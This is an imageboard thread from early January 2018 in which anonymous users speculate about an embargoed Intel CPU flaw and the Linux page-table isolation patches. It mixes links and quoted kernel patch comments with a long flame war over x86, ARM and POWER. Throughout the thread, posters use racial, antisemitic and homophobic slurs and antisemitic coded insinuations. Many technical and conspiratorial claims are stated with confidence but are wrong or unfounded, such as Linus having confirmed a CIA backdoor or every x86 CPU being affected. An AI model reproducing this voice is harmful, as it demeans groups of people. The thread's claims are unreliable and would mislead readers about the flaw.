Big intel CPU bug being covered up?

There is evidence of a massive Intel CPU hardware bug (currently under embargo) that directly affects big cloud providers like Amazon and Google. The fix will introduce notable performance penalties on Intel machines (30-35%).

People have noticed a recent development in the Linux kernel: a rather massive, important redesign (page table isolation) is being introduced very fast for kernel standards... and being backported! The "official" reason is to incorporate a mitigation called KASLR... which most security experts consider almost useless. There's also some unusual, suspicious stuff going on: the documentation is missing, some of the comments are redacted (twitter.com/grsecurity/status/947147105684123649) and people with Intel, Amazon and Google emails are CC'd.

According to one of the people working on it, PTI is only needed for Intel CPUs, AMD is not affected by whatever it protects against (lkml.org/lkml/2017/12/27/2). PTI affects a core low-level feature (virtual memory) and has severe performance penalties: 29% for an i7-6700 and 34% for an i7-3770S, according to Brad Spengler from grsecurity. PTI is simply not active for AMD CPUs. The kernel flag is named X86_BUG_CPU_INSECURE and its description is "CPU is insecure and needs kernel page table isolation".

Microsoft has been silently working on a similar feature since November: twitter.com/aionescu/status/930412525111296000

People are speculating on a possible massive Intel CPU hardware bug that directly opens up serious vulnerabilities on big cloud providers which offer shared hosting (several VMs on a single host), for example by letting a VM read from or write to another one.

Summary article: pythonsweetness.tumblr.com/post/169166980422/the-mysterious-case-of-the-linux-page-table (a bit outdated, follow @grsecurity, @scarybeasts and others on Twitter for up-to-date info)

Other urls found in this thread:

news.ycombinator.com/item?id=16046636
lwn.net/Articles/742404/
twitter.com/search?f=tweets&q=intel bug&src=typd
twitter.com/search?f=tweets&vertical=default&q=kaslr&src=typd
twitter.com/search?f=tweets&vertical=default&q=https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5aa90a84589282b87666f92b6c3c917c8080a9bf&src=typd
github.com/xoreaxeaxeax/sandsifter/raw/master/references/domas_breaking_the_x86_isa_wp.pdf
youtube.com/watch?v=dCPP-Gg_aMw
archive.fo/RpDmv
youtube.com/watch?v=7gRsgkdfYJ8
youtube.com/watch?v=wwRYyWn7BEo
nintendotoday.com/wii-u-cpu/
archive.fo/SfgGP
pythonsweetness.tumblr.com/post/169166980422/the-mysterious-case-of-the-linux-page-table
theregister.co.uk/2018/01/02/intel_cpu_design_flaw/
electronicsweekly.com/news/business/take-risks-says-intel-ceo-2017-12/
fool.com/investing/2017/12/19/intels-ceo-just-sold-a-lot-of-stock.aspx
yarn.co/yarn-clip/aaba1aa5-149e-4e30-b8c7-1d04109be202
pythonsweetness.tumblr.com/post/169166980422/the-mysterious-case-of-the-linux-page-table:
phoronix.com/scan.php?page=article&item=linux-415-x86pti&num=2
lwn.net/Articles/740393/
archive.fo/GSnCc
marc.info/?l=openbsd-tech&m=149732026405941&w=2
phoronix.com/scan.php?page=news_item&px=x86-PTI-Initial-Gaming-Tests

archive.is/kFte4
github.com/openbios
archive.fo/GEbMu
archive.fo/vlWP3
newsroom.intel.com/news/intel-responds-to-security-research-findings/
zdnet.com/article/security-flaws-affect-every-intel-chip-since-1995-arm-processors-vulnerable/
meltdownattack.com/
spectreattack.com/
meltdownattack.com
meltdownattack.com/meltdown.pdf
spectreattack.com/spectre.pdf
googleprojectzero.blogspot.co.at/2018/01/reading-privileged-memory-with-side.html
git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/arch/x86/kernel/cpu/common.c#n927
xenbits.xen.org/xsa/
spectreattack.com/#faq-why-spectre
access.redhat.com/security/vulnerabilities/speculativeexecution
computerbase.de/2018-01/intel-cpu-pti-sicherheitsluecke/
en.wikipedia.org/wiki/MIPS_architecture
github.com/xoreaxeaxeax/sandsifter
youtube.com/watch?v=iffTJ1vPCSo
youtube.com/watch?v=MujjuTWpQJk
lkml.org/lkml/2018/1/3/797
4everproxy.com/
kproxy.com/
amd.com/en/corporate/speculative-execution
github.com/torvalds/linux/commit/00a5ae218d57741088068799b810416ac249a9ce#diff-678874d00bf0df04f6f427f16f1dea36R926
archive.fo/pXsPA
blog.mozilla.org/security/2018/01/03/mitigations-landing-new-class-timing-attack/
twitter.com/aionescu/status/948609809540046849
ghacks.net/2017/11/22/how-to-enable-first-party-isolation-in-firefox/
siliconangle.com/blog/2016/04/07/in-blow-to-intels-data-center-reign-google-endorses-ibms-power-chips/
archive.fo/8MRFQ
googleprojectzero.blogspot.fi/2018/01/reading-privileged-memory-with-side.html
marc.info/?l=openbsd-misc&m=119318909016582&w=2
stackoverflow.com/questions/6582236/branch-predication-on-gpu
security.stackexchange.com/questions/91347/how-can-a-font-be-used-for-privilege-escalation
gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9e3d4bb6#gistcomment-2310736
pcworld.com/article/3245508/components-processors/intel-responds-to-the-cpu-kernel-bug.html
youtu.be/SqbNWCehbmU
support.google.com/faqs/answer/7622138#chromeos
youtu.be/LC1WuKdPVCQ
twitter.com/SFWRedditGifs

Microsoft is sending emails about planned Azure VM reboots on early January (see pic).

Some more links:

news.ycombinator.com/item?id=16046636 Hacker News discussion
lwn.net/Articles/742404/ Kernel page-table isolation merged in unusual conditions

Real-time tweets about it:
twitter.com/search?f=tweets&q=intel bug&src=typd
twitter.com/search?f=tweets&vertical=default&q=kaslr&src=typd
twitter.com/search?f=tweets&vertical=default&q=https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5aa90a84589282b87666f92b6c3c917c8080a9bf&src=typd

An actual conspiracy and Holla Forums is nowhere to be seen. Funny how that works. Cowards. But then again they can count past 6 million anyway.

Just one more bug for POWER to get there.

HOW SURPRISING!
github.com/xoreaxeaxeax/sandsifter/raw/master/references/domas_breaking_the_x86_isa_wp.pdf

implying this isn't has vague has any conspiracy
Talking about paranoia, you know that keeping citing the bogeyman makes them appear don't you ?

THIS

Notice that smell? Smells like... class action lawsuit. I can't wait to get my check over $12.46 from Intel.

Why do I find this so hard to believe?
Maybe its because after decades of fanboys shitflinging numbers and conjecture that I tend to take these things with a grain of salt?
Your thread is proof it most certainly not being covered up and companies aren't treating it with the same level of severity as your autistic ass because the numbers are likely grossly exaggerated

Holla Forums is a board about politics, not you're freetard pet soapbox, Holla Forums really shouldn't be this either but the cancer is incurable

And you cringey LARPers are the worst cancer too. OPs body clearly states the bug doesn't even effect AMD processors. I hate people like you who think they're smarter than industry leaders. People who think architecture A is good because its 'different' and have such lack of regards for the industry to think re-inventing the wheel is necessary. There's very good reasons POWER failed and little good reasons to start using it again. Stick to what you're good at, preaching about Linux on anonymous imageboards, that's the only industry exposure you're going to get

T.cianigger A.I

What's interesting is why (you) are bringing it to our attention just now when it is almost already fixed. I wonder why they thought it was so important to fix in private? It's already laughably easy to make a worm that targets x86 CPU's design quirks. What could this possibly be that they are so worried about with the already numerous ways of pwning a x86 cpu?

Maybe because high instruction density is not considered a security issue unless you're a retarded Pajeet, in which case just stick to making mobile apps

>we can't (((help))) you recover your password if you forget it with power CPU's

Your knowledge of the industry is truly flattering. I bet you know all about the POWER architecture and POWER assembly and everything. Your meme balls are truly telling

That entire post is a non-arguement. High instruction density has little to do with infiltrating a x86 system or pwning it after infiltration in a consistent manner across all x86 CPU's. You would want to be thinking something along the lines of system management mode you giant faggot.

X86 is not the only architecture with privileged modes. You and your infinite wisodm on computing architectures probably already knew that I'm sure

Now power isn't the most optimal for energy effeiciency nor security I will grant you that. But it doesn't have the modern CISC to RISC converter and (((ME)))/(((PSP))) cancer that x86_64 has. Even though it has a similar cancer to the on die schedulers that modern x86_64 cpu's have to control heat, it is also RISC based by comparison thereby reducing heat. The power CPU's available for purchase also have a open firmware. This leads to it being easier to scale in commercial applications ontop of making bug fixing much easier at the assembly level. granted if you find a bug from running large tasks in parellel at high clock speeds there is most likely something wrong with the way it was fabricated, but I digress. No I don't have every single assembler instruction memorized for the power architecture. I am very informed on what CPU's are fucking botnets though in cy+3. So fuck off cianigger

No there are those much smarter then me when it comes to computers. But I already knew about ARM's (((kikezone))) and MIPS' (((TEE's))). Nice job derailing you giant faggot.

The total die space and resources required for this is so incredibly negligible and is paramount for compatibility. You know, the thing you autists throw a massive fit over whenever its threatened to be compromised

X86s issues have been solved through architectural scaling. Its why we can have chips like Intel Atoms that can run fanless on batteries now. And POWER isn't going to prove a better solution to this

I didn't even directly cite anything AMD related (besides the pdf which is a general audit on x86 hardware).
Because industry leaders can't be retarded ?
Maybe you should go out sometimes and take fresh air.
You mean that intel having 90% of the market share and the blatant anti competitiveness that they did didn't influence other architectures from happening ?
.t buthurt bsdcuck

Holy shit that non-sequiter. X86 CPU's are cancer because of the scaling you giant faggot. This created problems when it comes to heat reduction because the proccesor is always waiting for the schedulers to keep up with the instructions being ordered correctly. But at scale and load this creates much more heat then using a RISC architecture straight up and having the devs/compiler account for the order of operations at compile time for parellelization. By distributing the load over the proccessor you further reduce heat on RISC because of how cheap it is to transfer instructions across the die. But on x86 it's very expensive to do so thereby creating scheduler bottlenecks and heat problems due to shit order of operation with parellelization. Why do you think they can't go any further then 7nm right now in size on die? Because the heat from transfering instructions across the die is the cancer that is killing x86 from improving performance.

Heat hasn't been an issue on x86 for years now. The inability to scale down to 7nm nodes has jack shit to do with heat. POWER and ARM experience identical thermal issues when they scale up to x86s level on desktops

let's see them scale away this
35% PERFORMANCE HIT
bitch

I honestly do not understand

Failing to deliver generational performance gains is the reason Intel and AMD dominate the supercomputer, PC, and high-end workstation markets. POWER died when Apple and eventually game consoles stopped using it and IBM can only blame their own incompetence

So that's why google massively invests in it.
Kys intel shill.

Why can't I go buy a fanless core I7 and run CPU intensive emulators like dolphin on it then without a fan? I can do that with a ARM cpu and they are complete shit compared to what they could be because of issue we have already been over.

You're not wrong, IBM gave up on power for the general public as part of their backroom deals with (((them))). But after the cancer that is intel ME and AMD's PSP it is looking better all the time.

I dare you to emulate an i7 at native speed with an arm chip without a fan.

Sure why not it's surly not because it's cheaper to buy AMD or that intel brakes their price when buy in enormous bundles.
And anti competitive behavior doesn't have influence AT ALL.
WEW
Apple changed just because it was cheaper.
Apple has only made the past decade decisions because of money saving.
You just mean nintendo.
Anyway nintendo went to ARM because they targeted audience that also wanted to have a transportable console.

I dare you to not make bloated software.

Not just Nintendo.
Also NVIDIA SHIELD

I didn't say that you giant faggot. I can run the same software but compiled for ARM without a fan. But which would require a i7 intel proccessor to get similar speeds if compiled for x86_64.

I feel like you're being willfully ignorant

Again it's portable, you're ranting about an architecture which isn't meant to be a small portable system or/an to do intense graphical work.
You aren't making any sense intel shill please stop and go back to /g/ or reddit.

No, I mean Sony and Microsoft both use AMD chips and Nintendo uses ARM. POWER is fucking dead

Because microsoft isn't compatible with intel maybe ?
Since the switch but otherwise they use power (and also amd) since the gamecube and before that it was NEC.

And still actively developed.
Please just stop you aren't convincing anyone here besides ignorants, the market share of cpu architectures in general is very wide and diverse you can't just say that X is dead because X enormous company doesn't use it.

Hey faggot, my Intel Atom Bay Trails tablet does the same shit on the shitty HD series GPU. it's not impressive.

You know what thr shield can't do? This;
youtube.com/watch?v=dCPP-Gg_aMw

Repeat after me;
ARM was never good and never will be
And before you call me a kike, you're the one here shilling for an architecture madr by a tranny

Were you born stupid? At 34x less energy used and no fan a qualcom snapdragon 800 SOC has about 1/8th of the performance of a fourth gen i7 archive.fo/RpDmv . This is before optimization on the ARM side which is still shit and while account for ARM being a shit risc implementation.

You mean since The console that's fucking dead AKA the WiiU

Your atom also uses a fuck ton more of electricty and doesn't have to convert from the CISC x86 to the RISC ARM instructions for running half life and such. If the dolphin emulator was well optimized software for ARM then it would fucking work better. Do realise though what a feet that is considering the electricty/energy usage of the nvidia tegra for that application though.
ARM is shit though

You don't know shit abound how thermal scaling works. This is infuriating. Its shocking how little anyone here knows abound fucking technology and still hide their conjecture behind walls of rhetoric

What do you think will happen when they try scaling the same Snapdragon 800 to an i7s level? It won't still be the same 34 times less energy used. Remember all those ARMv8 servers companies promised in the early 2010s? What happened to them? Why were they never delivered in the same scale people hoped? Hey faggot, maybe reality got in the way

You mean the emulator with the same portable codebase? Or what do you still think Android apps are written in Java?

Can your rhetoric even back why having a CISC RISC converter even impacts the architecture itself when real world evidence is in complete contrary to your conjecture?

Do you understand why I hate people like you?

i'm beginning to loose faith that linus isn't a cianigger or being paid of by every corporate kike under the sun to do things one way or another.

Gotta make money to spend money

Well no shit, ARM still has the out of order schedulers on die cancer that x86 has. Ontop of fucking pajeets and chinks being the ones programming the microcode for it. And the shitty ARM (((kikezone))) implementation and shitty compiler support for FOSS compilers because of ARM keeping the assembly somewhat secret.
Well let's do some math. An ARM SOC that uses 34x less energy scaled times 34 to equal the power usage of an i7. Ontop of adding liquid nitrogen to a proper heatsink. It would scale quite nicely for GFLOPS proccessed per cycle assuming it didn't melt the cheap chink case of the phone. I can't find a example of someone doing such a thing though because the software/firmware for the ARM proccessors is locked down which means little overclocking can be achieved.

Linus has confirmed some time ago that CIA/NSA came to him to install backdoor
youtube.com/watch?v=7gRsgkdfYJ8
Even his father who is a chairman at the European union talked about it at the EU.
youtube.com/watch?v=wwRYyWn7BEo

Power and heat output absolutely do not scale linearly like that

You can't even read correctly.
The wiiu was never arm.
The Power architecture is used by nintendo since the gamecube.
nintendotoday.com/wii-u-cpu/

I know, ARM is more effiecient at energy usage per cpu cycle as we have already established. Hence why that 1/8th gap would be made up with plenty of cycles to spare.

See

Its okay to admit you have no idea what you're talking about lad

Consoles do not use PowerPC anymore. Following semantics is hard I know

Not how it works, especially not when it comes to thermals. And clock speed =/= IPC

m8 you know that admitting being wrong with yourself is part of the process called growing up ?
You don't even have to post that you're wrong on the board just just can say "fuck I'm retarded" on your side and life goes on and nobody gives a dam.

No I think you have a difficult time understanding what I was saying
It's okay to admit you're wrong though

No consoles use POWER anymore. I am glad we got this established

What the fuck does interproccess communication IPC have to do with how quickly instructions are being fed down the pipeline? In haswell it was increased to something like 6 instructions per cycle I think. I'd have to go look up what ARM's per cycle instruction count is though.
lul yes they do you giant homo sucking faggot chink see the wii u archive.fo/SfgGP
Wow care to eduacte us then instead of leaving us to our delusions if you happen to know the truth of the matter? kys

IPC
Instructions Per Cycle

A concept well beyond you're understanding and it's self-evident

Also in case you hadn't realized, the WiiU is depreciated by the Switch. That's the points I was trying to make. For some reason its difficult for people on those board to understand

Wait I jumped the gun on that one. Fuck me

假的 臺灣本島

You really learned how to keep appearances on you side, continue you're going to go far like that.
Btw here's your (You).

Also, the besr ARM chips typically aren't more than 8 Single Precision Instructions Per Cycle. ARM chips aren't as heavily pipelined as POWER or X86, because otherwise you do run into the same scaling issues and ARM really cannot afford to crawl out of its low-power computing segment

Anyhow I'm tired and probably won't be replying to this thread anymore so whatever

There it is, the faggot who has to bring up Holla Forums in every thread for no rational reason.

Wow I am glad we both came to the same conclusion. So at the very least let's step into the power pc territory so atleast our shit proccessors don't have any fucking botnets on them by default like intel ME. You successfully derailed though. So here's your (you).

You're not wrong. But next time try focusing on that instead of pretending that performance or thermals are the issues that need to be solved by reinventing the wheel

This is not going to be some trivial vulnerability. There is no reason something with such a huge performance hit would be rushed through into the mainstream/upstream.

Well they energy and thermals are real issues if you care about true hardware security. Of which all proccessors in cy+3 are dogshit for. Improving them also has the side effect of better performance and or electrical power savings.

Sage doesn't send a thread down a level you know?

As you can observe in this thread instead of sticking ot the initial post of OP the intel shills made it slide into an endless BS discussion read and learn from this anons.

pythonsweetness.tumblr.com/post/169166980422/the-mysterious-case-of-the-linux-page-table

Are there any predictions on how old this bug is? From the comments in the linux kernel it seems like it could potentially be very old.

This thread:
And so on.

Since it seems to be hardware issue design problem it seems like since the beginning the software upgrades made recently is only to mitigate the potential damage.

this and see
What do you expect when some intel shill comes to defend their overlords and freetards who wants free/libre hardware.

I need to get some sleep.

Your posts are retarded shitposts too.

I'm sorry user, but being anti-POWER fanboy and giving Intel due credit is the the same as being an Intel shill. You people are fucking stupid.

this is an accurate summary

The reason why Holla Forums has a pph of 20.

autism

This isn't the self-diagnosis thread.

Wow this went to shit fast, thanks to Holla Forumstards and ARMshit fanboys.
This seems to only be relevant to virtualization though, in which case I hope you can turn this "fix" off at run time. Another nail in the wintel coffin :-)

What? Where?

oh, but hey thanks to your crew giving valuable meta and post quality and anonymous identity discussion.
Informing and exclaiming how "Holla Forums is shit is" way more important than all of technology itself.

(((Embargo))) on information. Comments (((redacted))) on commits. I can see the glow coming off Linux from here. Not surprising when you see all the people with @intel.com in the source tree.

This is why cloud computing will always be a security risk. It is better to run your own hardware.

fuck your right Holla Forums needs to get rid of all of this wrongthink and white men.

I see my thread is going well.

theregister.co.uk/2018/01/02/intel_cpu_design_flaw/

This is going to be brutal for Intel. They aren't talking about which models it affects, and they're trying to fix this all in secret. It must be a huge problem affecting a wide range of Intel CPUs.

Defend this, freefags

All they did was remove comments from the code.

Too late. His already ruined by cuckchan.

Embargoed security patches have been a thing for several decades in Linux, anime avatar LARPer. Would you rather have full disclosure of a bug that could be used to take over most of the world's servers in a few minutes via spreading through cloud providers?

Preety sure it affects all x86 CPU's with a MMU. Literally all of them. They did name the function
In OP.

Not him, but I would much rather have that than any kind of secrecy in supposedly open environments. The only thing they are "protecting" here is Intel's pocket book.

Considering this is only one of many that could do so, yes full disclosure would be nice. With jews you lose faggots. Stop using x86 and ARM cancer.

Embargo for something like 2-4 weeks would be a good compromise.

Holding on it for MONTHS so the intel exec's can dump their stock and the pajeet microsoft coder's could sell it to blackhats is unacceptable. So many OS vendors and dev's know about it there is no way it hasn't leaked out to the dark side by now. Servers are being raped as we speak.

Linux dev's going along with with this just proves they put their corporate master's interest's above their users.

kek, say it when you spot it in image

how can i find out if i have MMU? my pic above

no for real user, or are they all screwed cause of the evil inside?

sorry, i just thought id make a funny of my misfortune

Wow its literally fucking nothing unless you use Coffee Lake.

Every Intel processor since the 286 (I think) has had an MMU.

ok, thanks

From the Register link

electronicsweekly.com/news/business/take-risks-says-intel-ceo-2017-12/

Damn, unlucky start to the new year I guess.
I got it for $200 off on black Friday. I bet it's price will sky rocket now.

Or is it 4790k? Whatever that Haswell was.

Thiink you meant to paste this link, fam

Intel eternally BTFO'd by AMD on LKML

never mind, I found your quote at the bottom of that other

so whats better to use, shity android that only plays half of youtube vids or linux with evil inside?

I don't know how he managed to write that email without adding "lol"s everywhere

Abso-fucking-lutely. Maybe that could end (((Intel)))'s reign of terror.

good point, im sticking with linux with evil inside...

Feels insanely good to be running GNU+Linux on my Ryzen 5 1600 right now.

Does no one care how the BSDs are affected by this?

Maybe them being last to know is payback for breaking disclosure last time.

Because it affects everyone, it's a CPU level bug, Linux, BSD, Minix, Windows, probably Haiku as well.
No one is reading those mailing lists.

Wasn't that just OpenBSD and only really once? I can think of three potential times:
1: a patch against KRACK iirc, they just silently patched it, the author gave consent then removed it.
2: Accidential mailing list leak with OpenSSL
3: Only legitimate one, can't remember what it was but they asked for some absurd cover time so they just told them to fuck off.

Who told who to fuck off?

My memory could be really wrong but OpenBSD told a vendor to fuck themselves when they asked for a really long non disclosure time.

Jewtel has been knowingly shipping insecure chips in order to boost performance to keep AMD from catching up.

yarn.co/yarn-clip/aaba1aa5-149e-4e30-b8c7-1d04109be202

They wanted months of embargo for KRACK and OBSD told them to fuck off then patched it. After the typical embargo time. Theo maybe a dick but at least he doesn't throw his users under the bus.

You should get 30days after notification then let the info drop. With so many people involved there is no way it hasn't leaked on to the darkweb by now. Only end users are getting hurt by this now. Waiting months only serves to help asshole's like

It is also very interesting that the big cloud players get a heads up but the little guys are going to be completely blindsided.

Does this affect older models? What is the full list of processors affected?
Does it mean we're back to Sandy Bridge performance with only iGPU improvements?
Is Apple OS vulnerable too?
Does it affect only VMs and normal systems can avoid installing/running patches all the time?

No one knows the full details yet because of the (((embargo))).
But this could go all the way back way past sandy bridge. Past even the 1st 64bit Pentium.
Apple is effected because its an issue with the INTEL cpu not their OS. They will have to patch their OS just like everyone else to mitigate the CPU bug.

Any Intel CPU produced in the last 10 years is vulnerable
We're back to Nehalem
All OSes are vulnerable
It affects everything, it's a CPU bug that is so bad it has to be fixed by working around it on a software level.

From what I've gathered,
all Intels for the past decade

Yes
No, but if you don't care about security you might be able to disable it

It could but I'd be surprised if they used the same speculative branching techniques that far back.

wait wasn't this bug introduced by intel fscking something up with dual page table management?

Best details I've seen so far were in theregister.co.uk/2018/01/02/intel_cpu_design_flaw/ OP linked later.
Talks about speculative caching, and how a researcher had been trying to exploit it.

kek

Lurk twenty years and you would know this bug has been discloused for months now.

meant branching, not caching

So is 8ch going to get 30% slower now?
Can Ron please switch us to a Threadripper 1950x with 128GB of RAM?

>pythonsweetness.tumblr.com/post/169166980422/the-mysterious-case-of-the-linux-page-table:
"From a little digging through the FreeBSD source tree, it seems that so far other free operating systems are not implementing page table splitting"
This may turn out to just be a Windows,OSX, and Linux problem.

FreeBSD is notorious for ignoring basic security precepts.

OpenBSD isn't and they don't seem affected either.

There are likely other solutions to this problem that will not result in a performance hit. Hell, it sounds like just some simple optimization on the memory management side of things could solve this issue

You can easily configure a server to optimize kernel and userspace better so its highly doubtful. Remember, this only effects userspace programs that want to access kernel space memory. Just push more rudimentary shit to userspace and reserve kernel space for only the most secure bits. Windows could be effected far less for all we know since they can actually afford to move more shit to userspace on the count of their pseudo-microkernel design but we won't know for sure until Patch Tuesday

Maybe they are trying to keep extra-tight on the non-disclosure aspect to regain rep on that front?

If you understood how this bug worked you would realise that it affects anything with a MMU using the x86 arcitecture. Lurk twenty years now.

phoronix.com/scan.php?page=article&item=linux-415-x86pti&num=2
Redis is looking at ~25% hit.
Doesn't 8ch use Redis?

Looks to be executing unsigned "predictive" code. It's essentially like your browser executing scripts from webpages that come up on search suggestions. Except on a Kernel and CPU level. You can see how bad this is.

AMD stated it's not affecting their chips since their engineers aren't massive retards.

ARM64 is getting some of the same patches too
lwn.net/Articles/740393/

If that was the case then a software fix wouldn't work to begin with you giga retard.

Holy shit were you born stupid? Did you even research how the bug works? Lurk twenty years and everything is a fucking botnet you giant faggot. Do you really expect any of these liars to tell the truth, jewtel or (((amd)))? They won't.

I am aware of this you giant faggot. That's because it won't fix it permenently. It's like a bandaid ontop of the giant steaming pile of shit that is the x86 architecture and it's clones.

A) OpenBSD will not sign NDA's. If Linus signed a NDA over this then he completely sold you out to protect intel.

B) The rep they have now is they wont cover for shitty hardware vendors. They have always honored reasonable embargo's.Waiting MONTHS to sit on patches only fucks over the users in the end.

The coverup is always worse then the crime. I have a feeling this may turn in to a major shitshow of who-knew-what-and-when.

Are you the OP of that retro home computer thread?
You're right about the software patch though, the nice thing about a rushed software patch is that there are going to be more bugs to exploit in it, probably for a long time to come.

Windows wins again freetards

if (Muhcpu= Intel)
cout

No to both. This is that wifi shit all over again.

Really activates my almonds

I've been looking for OpenBSD's response (none that I can see), but came across KARL in the process. (KARL is a re-link of the Kernel on boot, with a random object ordering.) Do you think that this is why they haven't bothered?

I love how you showcase the fact you have exactly 0 comprehension on the nature of the bug and dare post the brainlet meme

Do the BSDs handle virtual memory differently than GNU/Linux?

No because of the POSIX standard, it is a CPU bug in x86 proccessors and the MMU archive.fo/GSnCc and has nothing to do with the way virtual memory is handled in linux. They are just modifying it to make it ever so slightly more difficult to abuse.

AMD doesn't run unsigned unsafe speculative code like Intel does. Did YOU read anything they were saying? Also, if it affected AMD the headlines wouldn't be all about Intel.

How hard is this going to fuck up virtual machines? I want to continue running Windows in a VM with hardware passthrough so I can play vidya but this seems like it might shit up the performance.

No idea: I would assume not because you're basically just implementing the Intel interface to the MMU. It's pretty much a complex hardware interface.

I wonder about this comment in the patch, maybe it's a red herring, in the function map_ldt_struct:
+ /*+ * Map it RO so the easy to find address is not a primary+ * target via some kernel interface which misses a+ * permission check.+ */
Maybe some syscalls were leaking kernel space addresses, leaving them open to exploit?

Wondering about that too, haven't seen any bare metal hypervisors mentioned.

That depends. OpenBSD tends to also be ahead of the game when it comes to security holes. Maybe one of their random mitigation tricks happens to prevent it? At this point it's all speculation though.

No, you can't prevent a hardware bug short of cutting off access to the hardware affected. This bug is in the hardware design of any x86 CPU with a MMU. OpenBSD handles their security valiantly compared to other OS's. But even they can't fix hardware issues like this one in software.

cool was considering switching over to AMD and this just sealed the decision

What they're doing with Windows and Linux is a mitigation because obviously they can't patch out broken hardware. Same issue with 3DS, where they can't patch out their bootloader, they can only try their best to hinder you from getting sufficient access to change it. It just wouldn't surprise me if OpenBSD had pre-empted the issue in some way, whatever it is. Apparently we'll know on the 4th for sure.

I'm most pissed off because of the dearth of AMD-based laptops, in particular, the lack of anything approaching Thinkpads or Toughbooks in general hardware quality, and that they've got their own blob issues and Intel ME type rubbish.

If it was a PC-based solution I was interested in I'm more interested in POWER9.

*to exploit the bootloader, bad wording. There's several serious flaws that allow early persistent takeover of the system.

There's still old powerpc macbooks out there if you are looking for slightly more secure hardware. Just slap openbsd and coreboot on one and you are good to go.

Think I found the reason in the full diff:
This has a down side: the LDT isn't (currently) randomized, and an attackthat can write the LDT is instant root due to call gates (thanks, AMD, forleaving call gates in AMD64 but designing them wrong so they're only usefulfor exploits). This can be mitigated by making the LDT read-only orrandomizing the mapping, either of which is strightforward on top of thispatch.This will significantly slow down LDT users, but that shouldn't matter forimportant workloads -- the LDT is only used by DOSEMU(2), Wine, and veryold libc implementations.

Now that the LDT mapping is in a known area when PAGE_TABLE_ISOLATION isenabled its a primary target for attacks, if a user space interface failsto validate a write address correctly. That can never happen, right?The SDM states: If the segment descriptors in the GDT or an LDT are placed in ROM, the processor can enter an indefinite loop if software or the processor attempts to update (write to) the ROM-based segment descriptors. To prevent this problem, set the accessed bits for all segment descriptors placed in a ROM. Also, remove operating-system or executive code that attempts to modify segment descriptors located in ROM.So its a valid approach to set the ACCESS bit when setting up the LDT entryand to map the table RO. Fixup the selftest so it can handle that new mode.

Gotta love the Intel shills poking at AMD (The first bit on Intel chips was reformatted, the AMD bit was added):
+ * On Intel CPUs, if a SYSCALL instruction is at the highest canonical+ * address, then that syscall will enter the kernel with a+ * non-canonical return address, and SYSRET will explode dangerously.+ * We avoid this particular problem by preventing anything executable+ * from being mapped at the maximum canonical address.+ *+ * On AMD CPUs in the Ryzen family, there's a nasty bug in which the+ * CPUs malfunction if they execute code from the highest canonical page.+ * They'll speculate right off the end of the canonical space, and+ * bad things happen. This is worked around in the same way as the+ * Intel problem.

More nuggets:
Note: PCID is generally available on Intel Sandybridge and later CPUs.Note: Up until this point TLB flushing was broken in this series.

PARAVIRT generally requires that the kernel not manage its own page tables.It also means that the hypervisor and kernel must agree wholeheartedlyabout what format the page tables are in and what they contain.PAGE_TABLE_ISOLATION, unfortunately, changes the rules and theycan not be used together.

Well OpenBSD just implemented karl in the official release that came out in October. They say they did it in 3 weeks. Why the rush to completely re-implement how the kernel works and is loaded?

marc.info/?l=openbsd-tech&m=149732026405941&w=2
It would be interesting if they mitigated the issue by (((pure coincidence))).

WINE BTFO

this is pissing me off even thinking all my vm's are going to take a fucking 35% performance hit. but my anger has to be nothing compared to every cloud corporate kike out there who is itching to shove their dick in intel/amd's asshole for the billions of dollars that's going to cost them.

This is Intel only actually. AMD apparently does not cut corners. Really makes you think in terms of how Intel always seems untouchable in single core performance.
In the end though, you deserve it. I think your anger is magnified by the fact that you trusted Intel.

Wait, you mean the Nintendo 3DS?
Nintendo can patch boot9 whenever they want. The reason they can't after people hack it is because Luma puts FIRM into read-only mode

As far as the new DS flashcard based hacks go, that isn't the result of a security flaw, rather, the bootloader is "backdoor'd" (more specifically so Nintendo Repair centers can re-flash the OS in the event someone sends in a bricked console as a result of a botched firmware update)

What they can't do is patch out the errors that allow B9S (or A9LH) to happen. Those are in the read-only bootrom. Actually, that's something they tried to account for in the Switch, which has a way to generate bootrom "patches". Kind of cute but they should've focused on getting it right to begin with since it's the root of trust.

intel did this on purpose to destroy the old non-me botnet market. i'll bet they disclosed the bug themselves through an intermediary, at the appropriate, most profitable time.

also insider trading, intel knew

That's just preposterous tinfoil since the bug affects pretty much all Intel CPUs except possibly some old ones without ME. The scale of the problem isn't known.

It affects all x86 cpu's with a MMU. Did you even read the fucking thread and links?

Since when do we know about the actual exploit? It's under wraps until the 4th supposedly.

Pentium 1's are the "newest" intel cpu to be confirmed not affected. Intel managed to fuck up so badly that they took an obsolete class of exploits that everyone had forgotten about and single handedly brought it back from extinction.
While the actual circumstances under which this bug could be exploited are very, very limited, the nature of the use cases (virtualization) make this pretty severe and indirectly effects everyone.

Lurk twenty years you giant faggot.

phoronix.com/scan.php?page=news_item&px=x86-PTI-Initial-Gaming-Tests

So my intuition proved correctly, applications that run mainly in usermode are not affected by this whatsoever. You can all stop shitflinging now you insufferable fanboys

Higher AWS bill and having to reboot everything? My job is going to be a bit more exciting, thanks Intel.

You think a reboot is going to clear the MMU?

What else do they pay you for?

If I only run free software which I trust I should not need this kernel patch right? All I need the computer for is browse the internets and compile my c++.

Well considering you can deliver this infection via just loading javascript into memory, you better absolutely trust everything that runs on your computer will never be hacked or targeted in some fashion. While also always browsing and blocking literally everything but text on the interwebs. Even then things like CSS quirks in browser can be abused to hack you. But I don't think anyone is that autistic for the gerneral population yet.

TLDR if you want real security stop using x86. If you want the feeling of security get the patch. If you want speed and to possibly be spied on then don't get the patch.

Every major architecture has at least 1 privileged mode. At least x86 is actually being actively audited for security do to its ubiquity. Maybe don't use x86 if you're a cum drinking retard

source on this? it is possible to write a javascript or webassembly program which directly exploits the cpu bug?

How will Linux ever recover? That's what you get for not writing an OS like a white person, you NIGGER!

When's Winter Break going to be over again?

Is there a current list of affected intel processors at this time?
I'm still using gentoo hardened kernel on my core duo.
Did it affect the Pentium D processor?

Oh don't even get me started on that cancer. Lurk two years if you want to know more.

It likely does affect the Pentium D. But unless you run a database that needs to access kernel mode memory from usermode numerous times a day, you will likely not notice a difference. Standard usermode application like web browsers and even the latest AAA video games have been benchmarked and have seen absolutely no performance impact whatsoever

Because programs already use ring 0 you retard. There's no need for an exploit, the botnet has free access.

